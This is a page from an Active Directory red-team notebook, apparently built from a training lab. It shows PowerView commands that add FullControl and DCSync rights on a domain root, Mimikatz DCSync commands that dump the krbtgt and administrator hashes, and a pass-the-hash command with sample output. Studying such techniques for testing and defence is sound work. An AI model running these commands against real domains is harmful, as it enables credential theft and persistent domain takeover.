🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page

Was this helpful?

  1. IV. Domain Persistence and Dominance

Persistence ACLs- Rights Abuse

There are even more interesting ACLs which can be abused.

For example, with DA privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run "DCSync".

#Get the Distinguished Name 
Import-module .\powerview.ps1
Get-NetOU


#Add FullControl rights: 
Import-module .\powerview.ps1
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights All -Verbose


#Add rights for DCSync:
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights DCSync -Verbose


#Execute DCSync from Powershell of student529 regular:
#This will extract hashes of the user invoked
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\administator"'

#if we get the hash we can do the following:
#run Powershell as local admin
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /ntlm:a29f7623fd11550def0192de9246f46b /run:powershell.exe"'

PS C:\Windows\system32> Invoke-Command -Computer dcorp-dc -ScriptBlock{whoami}
dcorp\administrator

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\Administrator"'

How it looks from AD

PreviousPersistence ACLs - Security DescriptorsNextPersistence ACL - AdminSDHolder

Last updated 4 years ago

Was this helpful?